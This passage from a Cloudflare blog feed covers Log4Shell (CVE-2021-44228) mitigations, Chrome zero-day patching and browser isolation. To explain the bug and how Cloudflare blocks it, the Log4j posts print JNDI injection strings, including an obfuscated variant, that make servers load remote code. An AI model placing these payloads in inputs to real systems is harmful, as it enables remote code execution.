            <content:encoded><![CDATA[ <p></p><p>On Friday, March 25, 2022, Google published an <a href="https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html">emergency security update</a> for all Chromium-based web browsers to patch a high severity vulnerability (CVE-2022-1096). At the time of writing, the specifics of the vulnerability are restricted until the majority of users have patched their local browsers.</p><p>It is important everyone takes a moment to update their local web browser. It’s one quick and easy action everyone can contribute to the <a href="https://www.cloudflare.com/learning/security/what-is-cyber-security/">cybersecurity</a> posture of their team.</p><p>Even if everyone updated their browser straight away, this remains a reactive measure to a threat that existed before the update was available. Let’s explore how Cloudflare takes a proactive approach by mitigating the impact of zero day browser threats with our <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">zero trust</a> and <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">remote browser isolation</a> services. Cloudflare’s remote browser isolation service is built from the ground up to protect against zero day threats, and all remote browsers on our global network have already been patched.</p>
    <div>
      <h3>How Cloudflare Zero Trust protects against browser zero day threats</h3>
      <a href="#how-cloudflare-zero-trust-protects-against-browser-zero-day-threats">
        
      </a>
    </div>
    <p>Cloudflare Zero Trust applies a layered defense strategy to protect users from zero day threats while browsing the Internet:</p><ol><li><p>Cloudflare’s roaming client steers Internet traffic over an encrypted tunnel to a nearby Cloudflare data center for inspection and filtration.</p></li><li><p>Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">secure web gateway</a> inspects and filters traffic based on our network intelligence, antivirus scanning and threat feeds. Requests to known malicious services are blocked and high risk or unknown traffic is automatically served by a remote browser.</p></li><li><p>Cloudflare’s browser isolation service executes all website code in a remote browser to protect unpatched devices from threats inside the unknown website.</p></li></ol>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Azer5s8j5dpIU1WFGdxY4/d4e56aa9f99e2d0e2d55bdcd7f14d6ed/image1-109.png" />
            
            </figure>
    <div>
      <h3>Protection from the unknown</h3>
      <a href="#protection-from-the-unknown">
        
      </a>
    </div>
    <p>Zero day threats are often exploited and exist undetected in the real world and actively target users through <a href="https://www.cloudflare.com/learning/email-security/what-is-email-fraud/">risky links in emails</a> or other external communication points such as customer support tickets. This risk cannot be eliminated, but it can be reduced by using remote browser isolation to minimize the attack surface. Cloudflare’s browser isolation service is built from the ground up to protect against zero day threats:</p><ul><li><p>Prevent compromised web pages from affecting the endpoint device by executing all web code in a remote browser that is physically isolated from the endpoint device. The endpoint device only receives a thin HTML5 remoting shell from our network and <a href="/cloudflare-and-remote-browser-isolation/">vector draw commands</a> from the remote browser.</p></li><li><p>Mitigate the impact of compromise by automatically destroying and reconstructing remote browsers back to a known clean state at the end of their browser session.</p></li><li><p>Protect adjacent remote browsers by encrypting all remote browser egress traffic, segmenting remote browsers with virtualization technologies and distributing browsers across physical hardware in our global network.</p></li><li><p>Aiding Security Incident Response (SIRT) teams by logging all remote egress traffic in the integrated secure web gateway logs.</p></li></ul>
    <div>
      <h3>Patching remote browsers around the world</h3>
      <a href="#patching-remote-browsers-around-the-world">
        
      </a>
    </div>
    <p>Even with all these security controls in place, patching browsers remains critical to eliminate the risk of compromise. The process of patching local and remote browsers tells two different stories that can be the difference between compromise, and avoiding a zero day vulnerability.</p><p>Patching your workforces local browsers requires politely asking users to interrupt their work to update their browser, or apply mobile device management techniques to disrupt their work by forcing an update. Neither of these options create happy users, or deliver rapid mitigation.</p><p>Patching remote browsers is a fundamentally different process. Since the remote browser itself is running on our network, Users and Administrators do not need to intervene as security patches are automatically deployed to remote browsers on Cloudflare’s network. Then without a user restarting their local browser, any traffic to an isolated website is automatically served from a patched remote browser.</p><p>Finally, browser based vulnerabilities such as CVE-2022-1096 are not uncommon. With over 300 in 2021 and over 40 already in 2022 (according to <a href="https://www.cvedetails.com/product/15031/Google-Chrome.html?vendor_id=1224">cvedetails.com</a>) it is critical for administrators to have a plan to rapidly mitigate and patch browsers in their organization.</p>
    <div>
      <h3>Get started with Cloudflare Browser Isolation</h3>
      <a href="#get-started-with-cloudflare-browser-isolation">
        
      </a>
    </div>
    <p>Cloudflare Browser Isolation is available to both self serve and enterprise customers. Whether you’re a small startup or a massive enterprise, our network is ready to serve fast and secure remote browsing for your team, no matter where they are based.</p><p>To get started, <a href="https://www.cloudflare.com/products/zero-trust/browser-isolation/">visit our website</a> and, if you’re interested in evaluating Browser Isolation, ask our team for a <a href="https://www.cloudflare.com/products/zero-trust/interactive-demo/">demo</a> with our <a href="/clientless-web-isolation-general-availability/">Clientless Web Isolation</a>.</p> ]]></content:encoded>
            <category><![CDATA[Remote Browser Isolation]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[CVE]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[SASE]]></category>
            <guid isPermaLink="false">PvGPusZFJAtjsz3BzTyM3</guid>
            <dc:creator>Tim Obezuk</dc:creator>
        </item>
        <item>
            <title><![CDATA[Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability]]></title>
            <link>https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/</link>
            <pubDate>Tue, 14 Dec 2021 10:23:30 GMT</pubDate>
            <description><![CDATA[ Many Cloudflare customers consume their logs using software that uses Log4j, so we are mitigating any exploit attempts via Cloudflare Logs. ]]></description>
            <content:encoded><![CDATA[ <p>On December 9, 2021, the world learned about <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">CVE-2021-44228</a>, a zero-day exploit affecting the <a href="https://logging.apache.org/log4j/2.x/index.html">Apache Log4j utility</a>.  Cloudflare immediately <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">updated our WAF</a> to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.</p><p>However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.</p><p>Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our <a href="https://developers.cloudflare.com/logs/reference/logpush-api-configuration#options">developer docs</a> or see details below.</p>
    <div>
      <h3>How the attack works</h3>
      <a href="#how-the-attack-works">
        
      </a>
    </div>
    <p>You can read more about <a href="/inside-the-log4j2-vulnerability-cve-2021-44228/">how the Log4j vulnerability works</a> in our blog post . In short, an attacker can add something like <code>${jndi:ldap://example.com/a}</code> in any string. Log4j will then make a connection on the Internet to retrieve this object.</p><p>Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">remote code execution</a> on any system that reads these fields and uses an unpatched instance of Log4j.</p>
    <div>
      <h3>Our mitigation plan</h3>
      <a href="#our-mitigation-plan">
        
      </a>
    </div>
    <p>Unfortunately, just checking for a token like <code>${jndi:ldap</code> is not sufficient to protect against this vulnerability. Because of the expressiveness of the templating language, it’s necessary to check for obfuscated variants as well. Already, we are seeing attackers in the wild use variations like <code>${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}</code>.  Thus, redacting the token ${ is the most general way to defend against this vulnerability.</p><p>The token <code>${</code> appears up to 1,000 times per second in the logs we currently send to customers. A spot check of some records shows that many of them are <i>not</i> attempts to exploit this vulnerability. Therefore, we can’t safely redact our logs without impacting customers who may expect to see this token in their logs.</p><p>Starting now, customers can update their Logpush jobs to redact the string <code>${</code> and replace it with <code>x{</code> everywhere.</p><p>To enable this, customers can update their Logpush job options configuration to include the parameter <code>CVE-2021-44228=true</code>. For detailed instructions on how to do this using the Logpush API, see the example in <a href="https://developers.cloudflare.com/logs/reference/logpush-api-configuration/examples/example-logpush-curl#step-6---updating-logpull_options">our developer documentation</a>. Please note that this option is not currently available in the Cloudflare Dashboard and only modifiable by using the API.</p> ]]></content:encoded>
            <category><![CDATA[Logs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Log4J]]></category>
            <category><![CDATA[Log4Shell]]></category>
            <guid isPermaLink="false">2gTEgDnn3ynhqs9rwNuhie</guid>
            <dc:creator>Jon Levine</dc:creator>
            <dc:creator>Sohei Okamoto</dc:creator>
        </item>
        <item>
            <title><![CDATA[Secure how your servers connect to the Internet today]]></title>
            <link>https://blog.cloudflare.com/secure-how-your-servers-connect-to-the-internet-today/</link>
            <pubDate>Fri, 10 Dec 2021 21:24:45 GMT</pubDate>
            <description><![CDATA[ The vulnerability disclosed yesterday in the Java-based logging package, log4j, allows attackers to execute code on a remote server. We’ve updated Cloudflare’s WAF to defend your infrastructure against this 0-day attack.  ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5RR4OEZ10OPwCPZtkBw7BY/a0da90390c7a360a6c5a21c1299f8aad/image2-6.png" />
            
            </figure><p>The vulnerability disclosed yesterday in the Java-based logging package, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">log4j</a>, allows attackers to execute code on a remote server. We’ve <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">updated Cloudflare’s WAF</a> to defend your infrastructure against this 0-day attack. The attack also relies on exploiting servers that are allowed unfettered connectivity to the public Internet. To help solve that challenge, your team can deploy Cloudflare One today to filter and log how your infrastructure connects to any destination.</p>
    <div>
      <h3>Securing traffic inbound and outbound</h3>
      <a href="#securing-traffic-inbound-and-outbound">
        
      </a>
    </div>
    <p>You can read about the vulnerability in more detail in our <a href="/inside-the-log4j2-vulnerability-cve-2021-44228/">analysis published earlier today</a>, but the attack starts when an attacker adds a specific string to input that the server logs. Today’s updates to Cloudflare’s <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> block that malicious string from being sent to your servers. We still strongly recommend that you patch your instances of log4j immediately to prevent lateral movement.</p><p>If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server. The destination of the malicious server could be any arbitrary URL. Attackers who control that URL can then respond to the request with arbitrary code that the server can execute.</p><p>At the time of this blog, it does not appear any consistent patterns of malicious hostnames exist like those analyzed in the SUNBURST <a href="/a-quirk-in-the-sunburst-dga-algorithm/">attack</a>. However, any server or network with unrestricted connectivity to the public Internet is a risk for this specific vulnerability and others that rely on exploiting that open window.</p>
    <div>
      <h3>First, filter and log DNS queries with two-clicks</h3>
      <a href="#first-filter-and-log-dns-queries-with-two-clicks">
        
      </a>
    </div>
    <p>From what we’re <a href="/actual-cve-2021-44228-payloads-captured-in-the-wild/">observing in early reports</a>, the vulnerability mostly relies on connectivity to IP addresses. Cloudflare’s network firewall, the second step in this blog, focuses on that level of security. However, your team can adopt a defense-in-depth strategy by deploying <a href="https://www.cloudflare.com/teams/gateway/">Cloudflare's protective DNS resolver</a> today to apply DNS filtering to add security and visibility in minutes to any servers that need to communicate out to the Internet.</p><p>If you configure Cloudflare Gateway as the DNS resolver for those servers, any DNS query they make to find the IP address of a given host, malicious or not, will be sent to a nearby Cloudflare data center first. Cloudflare runs the world’s fastest DNS resolver so that you don’t have to compromise performance for this level of added safety and logging. When that query arrives, Cloudflare’s network can then:</p><ul><li><p>filter your DNS queries to block the resolution of queries made to known malicious destinations, and</p></li><li><p>log every query if you need to investigate and audit after potential events.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6pdqNiaLKK39ZpQhwAijQ3/48c21191912664545c659bf279229654/image2-43.png" />
            
            </figure><p>Alternatively, if you know every host that your servers need to connect to, you can create a positive security model with Cloudflare Gateway. In this model, your resource can only send DNS queries to the domains that you provide. Queries to any other destinations, including new and arbitrary ones like those that could be part of this attack, will be blocked by default.</p><p>&gt; Ready to get started today? You can begin filtering and logging all of the DNS queries made by your servers or your entire network with these instructions <a href="https://developers.cloudflare.com/cloudflare-one/tutorials/secure-dns-network">here</a>.</p>
    <div>
      <h3>Second, secure network traffic leaving your infrastructure</h3>
      <a href="#second-secure-network-traffic-leaving-your-infrastructure">
        
      </a>
    </div>
    <p>Protective DNS filtering can add security and visibility in minutes, but bad actors can target all of the other ways that your servers communicate out to the rest of the Internet. Historically, organizations deployed network firewalls in their data centers to filter the traffic entering and exiting their network. Their teams ran capacity planning exercises, purchased the appliances, and deployed hardware. Some of these appliances eventually moved to the cloud, but the pain of deployment stayed mostly the same.</p><p><a href="/replace-your-hardware-firewalls-with-cloudflare-one/">Cloudflare One’s network firewall</a> helps your team secure all of your network’s traffic through a single, cloud-native, solution that does not require that you need to manage any hardware or any virtual appliances. Deploying this level of security only requires that you decide how you want to send traffic to Cloudflare. You can connect your network through multiple on-ramp options, including network layer (GRE or <a href="/anycast-ipsec/">IPsec</a> tunnels), <a href="https://www.cloudflare.com/network-interconnect/">direct connections</a>, and a <a href="/warp-for-desktop/">device client</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4XMT21ke3qs0cqSvJiuTj1/8bac85d80764b3e28ec3e94bf54e2ec1/image1-59.png" />
            
            </figure><p>Once connected, traffic leaving your network will first route through a Cloudflare data center. Cloudflare’s network will apply filters at layers 3 through 5 of the OSI model. Your administrators can then create policies based on IP, port, protocol in both <a href="https://developers.cloudflare.com/magic-firewall/reference/magic-firewall-fields">stateless</a> and <a href="https://developers.cloudflare.com/cloudflare-one/policies/filtering/network-policies#expressions">stateful</a> options. If you want to save even more time, Cloudflare uses the data we have about threats on the Internet to create managed lists for you that you can block with a single click.</p><p>Similar to DNS queries, if you know that your servers and services in your network only need to reach specific IPs or ports, you can build a positive security model with allow-list rules that restrict connections and traffic to just the destinations you specify. In either model, Cloudflare’s network will handle logging for you. Your team can export these logs to your SIEM for audit retention or additional analysis if you need to investigate a potential attack.</p><p>&gt; Ready to get started securing your network? Follow the guide <a href="/replace-your-hardware-firewalls-with-cloudflare-one/#:~:text=Protecting%20a%20high%2Dtraffic%20data%20center%20or%20VPC">here</a> and <a href="https://www.cloudflare.com/magic-firewall/">tell us</a> you’d like to get started and we’ll be ready to help your team.</p>
    <div>
      <h3>Third, inspect and filter HTTP traffic</h3>
      <a href="#third-inspect-and-filter-http-traffic">
        
      </a>
    </div>
    <p>Some attacks will rely on convincing your servers and endpoints to send HTTP requests to specific destinations, leaking data or grabbing malware to download in your infrastructure. To help solve that challenge, you can layer HTTP inspection, virus scanning, and logging in Cloudflare’s network.</p><p>If you completed Step Two above, you can use the same on-ramp that you configured to upgrade UDP and TCP traffic where Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway</a> can apply HTTP filtering and logging to the requests leaving your network. If you need more granular control, you can deploy Cloudflare’s client software to build rules that only apply to specific endpoints in your infrastructure.</p><p>Like every other layer in this security model, you can also only allow your servers to connect to an approved list of destinations. Cloudflare’s Secure Web Gateway will allow and log those requests and block attempts to reach any other destinations.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5JSkBxbWgUyMvbK3o74Elf/2523d8d3f033b715b16b0032b3d53e0d/image3-26.png" />
            
            </figure><p>&gt; Ready to begin inspecting and filtering HTTP traffic? Follow the instructions <a href="https://developers.cloudflare.com/cloudflare-one/setup">here</a> to get started today.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Deploying filtering and logging today will help protect against the next attack or attempts to continue to exploit today’s vulnerability, but we’re encouraging everyone to start by <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">patching your deployments</a> of log4j immediately.</p><p>As we write this, we’re updating existing managed rulesets to include reports of destinations used to attempt to exploit today’s vulnerability. We’ll continue to update those policies as we <a href="/actual-cve-2021-44228-payloads-captured-in-the-wild/">learn more information</a>.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Log4J]]></category>
            <guid isPermaLink="false">5iBq5i8e8aK7x7p4iyykGm</guid>
            <dc:creator>Sam Rhea</dc:creator>
        </item>
        <item>
            <title><![CDATA[Inside the Log4j2 vulnerability (CVE-2021-44228)]]></title>
            <link>https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/</link>
            <pubDate>Fri, 10 Dec 2021 18:36:10 GMT</pubDate>
            <description><![CDATA[ In this post we explain the history of this vulnerability, how it was introduced, how Cloudflare is protecting our clients. We will update later with actual attempted exploitation we are seeing blocked by our firewall service. ]]></description>
            <content:encoded><![CDATA[ <p><i>In previous versions of this blog post slightly different mitigation techniques were recommended. The Apache Log4j project has updated their official guidance and we have updated this blog post in line with their recommendations</i></p><p>Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">Log4j</a> was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">Remote Code Execution (RCE)</a>. Because of the widespread use of Java and Log4j this is likely one of the most serious vulnerabilities on the Internet since both <a href="/tag/heartbleed/">Heartbleed</a> and <a href="/inside-shellshock/">ShellShock</a>.</p><p>It is <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">CVE-2021-44228</a> and affects version 2 of Log4j between versions 2.0-beta-9 and 2.14.1. It is patched in 2.16.0.</p><p>In this post we explain the history of this vulnerability, how it was introduced, how Cloudflare is protecting our clients. <a href="/actual-cve-2021-44228-payloads-captured-in-the-wild/">Details of actual attempted exploitation</a> we are seeing blocked by our firewall service are in a separate blog post.</p><p>Cloudflare uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.</p><p>But, if you work for a company that is using Java-based software that uses Log4j you should immediately read the section on how to mitigate and protect your systems before reading the rest.</p>
    <div>
      <h3>How to Mitigate CVE-2021-44228</h3>
      <a href="#how-to-mitigate-cve-2021-44228">
        
      </a>
    </div>
    <p>Implement one of the following mitigation techniques:  Java 8 (or later) users should upgrade to release 2.16.0. Java 7 users should upgrade to release 2.12.2.</p><p>Otherwise, in any release other than 2.16.0, you may remove the <code>JndiLookup</code> class from the <code>classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code></p>
    <div>
      <h3>Vulnerability History</h3>
      <a href="#vulnerability-history">
        
      </a>
    </div>
    <p>In 2013, in <a href="https://blogs.apache.org/logging/entry/apache_log4j_2_0_beta9">version 2.0-beta9</a>, the Log4j package added the “JNDILookup plugin” in issue <a href="https://issues.apache.org/jira/browse/LOG4J2-313">LOG4J2-313</a>. To understand how that change creates a problem, it’s necessary to understand a little about <a href="https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface">JNDI</a>: Java Naming and Directory Interface.</p><p>JNDI has been present in Java since the late 1990s. It is a directory service that allows a Java program to find data (in the form of a Java object) through a directory. JNDI has a number of service provider interfaces (SPIs) that enable it to use a variety of directory services.</p><p>For example, SPIs exist for the CORBA COS (Common Object Service), the Java RMI (Remote Method Interface) Registry and LDAP. LDAP is a very popular directory service (the Lightweight Directory Access Protocol) and is the primary focus of CVE-2021-44228 (although other SPIs could potentially also be used).</p><p>A Java program can use JNDI and LDAP together to find a Java object containing data that it might need. For example, in the standard Java documentation there’s an <a href="https://docs.oracle.com/javase/jndi/tutorial/getStarted/examples/directory.html">example</a> that talks to an LDAP server to retrieve attributes from an object. It uses the URL <code>ldap://localhost:389/o=JNDITutorial</code> to find the JNDITutorial object from an LDAP server running on the same machine (localhost) on port 389 and goes on to read attributes from it.</p><p>As the tutorial says “<i>If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL</i>”. Thus the LDAP server could be running on a different machine and potentially anywhere on the Internet. That flexibility means that if an attacker could control the LDAP URL they’d be able to cause a Java program to load an object from a server under their control.</p><p>That’s the basics of JNDI and LDAP; a useful part of the Java ecosystem.</p><p>But in the case of Log4j an attacker can control the LDAP URL by causing Log4j to try to write a string like <code>${jndi:ldap://example.com/a}</code>. If that happens then Log4j will connect to the LDAP server at example.com and retrieve the object.</p><p>This happens because Log4j contains <a href="https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution">special syntax</a> in the form <code>${prefix:name}</code> where <code>prefix</code> is one of a number of different <a href="https://logging.apache.org/log4j/2.x/manual/lookups.html">Lookups</a> where <code>name</code> should be evaluated. For example, <code>${java:version}</code> is the current running version of Java.</p><p><a href="https://issues.apache.org/jira/browse/LOG4J2-313">LOG4J2-313</a> added a <code>jndi</code> Lookup as follows: “The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a ":" no prefix will be added.”</p><p>With a : present in the key, as in <code>${jndi:ldap://example.com/a}</code> there’s no prefix and the LDAP server is queried for the object. And these Lookups can be used in both the configuration of Log4j as well as when lines are logged.</p><p>So all an attacker has to do is find some input that gets logged and add something like  <code>${jndi:ldap://example.com/a}</code>. This could be a common HTTP header like <code>User-Agent</code> (that commonly gets logged) or perhaps a form parameter like <code>username</code> that might also be logged.</p><p>This is likely very common in Java-based Internet facing software that uses Log4j. More insidious is that non-Internet facing software that uses Java can also be exploitable as data gets passed from system to system.</p><p>For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science and the exploit could get logged. This is why it is vital that all Java-based software that uses Log4j version 2 is patched or has mitigations applied immediately. Even if the Internet-facing software is not written in Java it is possible that strings get passed to other systems that are in Java allowing the exploit to happen.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4gTLQSjXHxMPpuJw2IHAEj/585931b99b1c1afcab6490c8b96f7161/Exploit-activated.png" />
            
            </figure><p>Or imagine a Java-based billing system that logs when the customer's first name is not found. A malicious user might create an order with a first name that contains the exploit, and it might take multiple hops (and a lot of time) to make it from the web server, via a customer database and into the billing system where it finally executes.</p><p>And Java is used for many more systems than just those that are Internet facing. For example, it’s not hard to imagine a package handling system that scans QR codes on boxes, or a contactless door key both being vulnerable if they are written in Java and use Log4j. In one case a carefully crafted QR code might contain a postal address containing the exploit string; in the other a carefully programmed door key could contain the exploit and be logged by a system that keeps track of entries and exits.</p><p>And systems that do periodic work might pick up the exploit and log it later. So the exploit could lay dormant until some indexing, roll-up, or archive process written in Java inadvertently logs the bad string. Hours or even days later.</p>
    <div>
      <h3>Cloudflare Firewall Protection</h3>
      <a href="#cloudflare-firewall-protection">
        
      </a>
    </div>
    <p>Cloudflare rolled out protection for our customers using our <a href="https://www.cloudflare.com/waf/">Firewall</a> in the form of rules that block the <code>jndi</code> Lookup in common locations in an HTTP request. This is detailed <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">here</a>. We have continued to refine these rules as attackers have modified their exploits and will continue to do so.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[Log4J]]></category>
            <category><![CDATA[Log4Shell]]></category>
            <guid isPermaLink="false">1dBMPk1AehQd2mlDZo2yOF</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[CVE-2021-44228 - Log4j RCE 0-day mitigation]]></title>
            <link>https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/</link>
            <pubDate>Fri, 10 Dec 2021 11:39:08 GMT</pubDate>
            <description><![CDATA[ A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021, that results in remote code execution (RCE). ]]></description>
            <content:encoded><![CDATA[ <p></p><p><i>Update: all three WAF rules have now been configured with a default action of </i><code><i>BLOCK</i></code><i>.</i></p><p>A zero-day exploit affecting the popular <a href="https://logging.apache.org/log4j/2.x/index.html">Apache Log4j utility</a> (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">CVE-2021-44228</a>) was made public on December 9, 2021, that results in <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">remote code execution (RCE)</a>.</p><p>This vulnerability is actively being exploited and anyone using Log4j should update to version 2.15.0 as soon as possible. The latest version can already be found on the <a href="https://logging.apache.org/log4j/2.x/download.html">Log4j download page</a>.</p><p>If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions &gt;=2.10 by setting the system property <code>log4j2.formatMsgNoLookups</code> or the <code>LOG4J_FORMAT_MSG_NO_LOOKUPS</code> environment variable to <code>true</code>.</p><p>Customers using the Cloudflare WAF can also leverage three newly deployed rules to help mitigate any exploit attempts:</p><table><tr><td><p><b>Rule ID</b></p></td><td><p><b>Description</b></p></td><td><p><b>Default Action</b></p></td></tr><tr><td><p><code>100514 </code>(legacy WAF)
<code>6b1cc72dff9746469d4695a474430f12 </code>(new WAF)</p></td><td><p>Log4j Headers</p></td><td><p><code>BLOCK</code></p></td></tr><tr><td><p><code>100515 </code>(legacy WAF)
<code>0c054d4e4dd5455c9ff8f01efe5abb10 </code>(new WAF)</p></td><td><p>Log4j Body</p></td><td><p><code>BLOCK</code></p></td></tr><tr><td><p><code>100516 </code>(legacy WAF)
<code>5f6744fa026a4638bda5b3d7d5e015dd </code>(new WAF)</p></td><td><p>Log4j URL</p></td><td><p><code>BLOCK</code></p></td></tr></table><p>The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.</p><p>We are continuing to monitor the situation and will update any WAF managed rules accordingly.</p><p>More details on the vulnerability can be found on the official <a href="https://logging.apache.org/log4j/2.x/security.html">Log4j security page</a>.</p>
    <div>
      <h3>Who is affected</h3>
      <a href="#who-is-affected">
        
      </a>
    </div>
    <p>Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.</p><p>In all Log4j versions &gt;= 2.0-beta9 and ← 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Log4J]]></category>
            <category><![CDATA[Log4Shell]]></category>
            <guid isPermaLink="false">UBMongwawwkY03LMVbocf</guid>
            <dc:creator>Gabriel Gabor</dc:creator>
            <dc:creator>Andre Bluehs</dc:creator>
        </item>
        <item>
            <title><![CDATA[Browser Isolation for teams of all sizes]]></title>
            <link>https://blog.cloudflare.com/browser-isolation-for-teams-of-all-sizes/</link>
            <pubDate>Tue, 23 Mar 2021 13:01:00 GMT</pubDate>
            <description><![CDATA[ Protecting endpoints from browser-born zero-day attacks and malware with remote browser isolation is now easy for teams of any size. ]]></description>
            <content:encoded><![CDATA[ <p>Every Internet-connected organization relies on web browsers to operate: accepting transactions, engaging with customers, or working with sensitive data. The very act of clicking a link triggers your web browser to download and execute a large bundle of unknown code on your local device.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/14XtPSLyUvlfQFjTYYDoTT/a4273c6a6b94fec1567a0eb420ad57f4/Browser-Isolation-OG-body-3.png" />
            
            </figure><p>IT organizations have always been on the back foot while defending themselves from security threats. It is not a question of ‘if’, but ‘when’ the next zero-day vulnerability will compromise a web browser. How can IT organizations protect their users and data from unknown threats without over-blocking every potential risk? The solution is to shift the burden of executing untrusted code from the user’s device to a remote isolated browser.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Kwv4UgTOIsQ2H80GztC6d/524c2dc3bdf81bec78e1475242fbfd7b/image4-27.png" />
            
            </figure>
    <div>
      <h3>Bringing Remote Browser Isolation to teams of any size</h3>
      <a href="#bringing-remote-browser-isolation-to-teams-of-any-size">
        
      </a>
    </div>
    <p>Today we are excited to announce that Cloudflare Browser Isolation is now available within Cloudflare for Teams suite of <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">zero trust security</a> and secure web browsing services as an add-on. Teams of any size from startups to large enterprises can benefit from reliable and safe browsing without changing their preferred web browser or setting up complex network topologies.</p>
    <div>
      <h3>Remote Browsers must be reliable</h3>
      <a href="#remote-browsers-must-be-reliable">
        
      </a>
    </div>
    <p>Running sensitive workloads in secure environments is nothing new, and <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">Remote Browser Isolation (RBI) technologies</a> have existed for many years. This begs the question, why are remote browsers not a common technology used by everyone?</p><p>The answer is — historically flawed execution. Everyone relies on web browsers for the majority of their work and any impact to user experience or performance can at best mean productivity losses and at worst outright rejection of the solution.</p><p>Unreliable rendering and poor performance in legacy browser isolation solutions has led IT organizations to reserve the enhanced security posture only for highly targeted users or activities. Much like trusting networks through the castle-and-moat model, assuming some users or websites are not phishing or malware vectors leaves an open door to attack.</p><p>Cloudflare Browser Isolation is built on top of Chromium (the same engine that powers other popular web browsers such as Google Chrome, Microsoft Edge and Brave Browser). This, combined with our novel <a href="/cloudflare-and-remote-browser-isolation/">Network Vector Rendering</a> technique, ensures that web pages are safely and consistently rendered even as web technologies evolve and become more complex.</p>
    <div>
      <h3>Remote Browsers Must Be Fast</h3>
